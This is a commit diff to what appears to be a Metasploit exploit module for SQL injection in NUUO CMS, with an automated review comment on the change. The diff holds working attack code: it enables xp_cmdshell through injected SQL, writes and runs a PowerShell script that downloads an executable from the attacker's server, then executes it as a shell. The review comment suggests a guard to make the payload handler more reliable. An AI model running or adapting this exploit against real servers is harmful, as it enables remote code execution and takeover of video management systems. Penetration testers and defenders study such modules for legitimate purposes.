
Commit 4a4637d

committed
Move execute shell
1 parent 2e28ffe commit 4a4637d


1 file changed

+6
-22
lines changed


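--- a/modules/exploits/windows/nuuo/nuuo_cms_sqli.rb
+++ b/modules/exploits/windows/nuuo/nuuo_cms_sqli.rb
@@ -44,11 +44,7 @@ def initialize(info={})
 'Privileged' => false, # we run as NETWORK_SERVICE
 'DisclosureDate' => 'Oct 11 2018',
 'DefaultTarget' => 0))
-register_options(
-[
-Opt::RPORT(5180),
-OptInt.new('SLEEP', [true, 'How long to wait for the payload download', '15']),
-])
+register_options [Opt::RPORT(5180)]
 end
 
 
@@ -68,8 +64,10 @@ def on_request_uri(cli, request)
 return
 end
 print_good('Sending the payload to CMS...')
-@exe_sent = true
 send_response(cli, @pl)
+
+print_status('Executing shell...')
+inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#{@filename}\""), true)
 end
 
 def create_hex_cmd(cmd)
@@ -89,7 +87,6 @@ def exploit
 end
 
 @pl = generate_payload_exe
-@exe_sent = false
 resource_uri = "/#{rand_text_alpha(8..16)}"
 
 #do not use SSL
@@ -112,29 +109,16 @@ def exploit
 # we need to roll our own here instead of using the MSSQL mixins
 # (tried that and it doesn't work)
 print_status("Enabling xp_cmdshell and asking CMS to download and execute #{service_url}")
-filename = "#{rand_text_alpha_lower(8..10)}.exe"
+@filename = "#{rand_text_alpha_lower(8..10)}.exe"
 download_pl = %{xp_cmdshell }
 download_pl << %{'cd C:\\windows\\temp\\ && }
 download_pl << %{echo $webclient = New-Object System.Net.WebClient >> wget.ps1 && }
 download_pl << %{echo $url = "#{service_url}" >> wget.ps1 && }
-download_pl << %{echo $file = "#(unknown)" >> wget.ps1 && }
+download_pl << %{echo $file = "#{@filename}" >> wget.ps1 && }
 download_pl << %{echo $webclient.DownloadFile($url,$file) >> wget.ps1 && }
 download_pl << %{powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1'}
 
 print_status('Injecting PowerShell payload')
 inject_sql("exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; " + create_hex_cmd(download_pl))
-
-counter = 0
-while (not @exe_sent || counter >= datastore['SLEEP'])
-Rex.sleep(1)
-counter += 1
-end
-
-unless @exe_sent
-fail_with(Failure::Unknown, 'Could not get CMS to download the payload')
-end
-
-print_status('Executing shell...')
-inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#(unknown)\""), true)
 end
 end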
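Review bot: Every request that reaches `send_response` at new line 67 now also re-runs `inject_sql(create_hex_cmd(...), true)` at new line 70, because the removed `@exe_sent = true` at old line 71 is not replaced by any record that the payload was already served. Unless the conditional that closes at new line 65 (its head is outside the hunk) already rejects repeat requests, a guard `return if @exe_sent` before `print_good`, paired with `@exe_sent = true` after `send_response`, keeps the handler idempotent. The handler also depends on `@filename` being assigned by `exploit` (new line 112 in the last hunk) before the CMS requests the payload, which holds in the order shown but is stated nowhere; a comment on the `inject_sql` line such as `# @filename is set in exploit before the download is triggered` would make the coupling explicit. Both `on_request_uri` and `exploit` begin outside their hunks.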
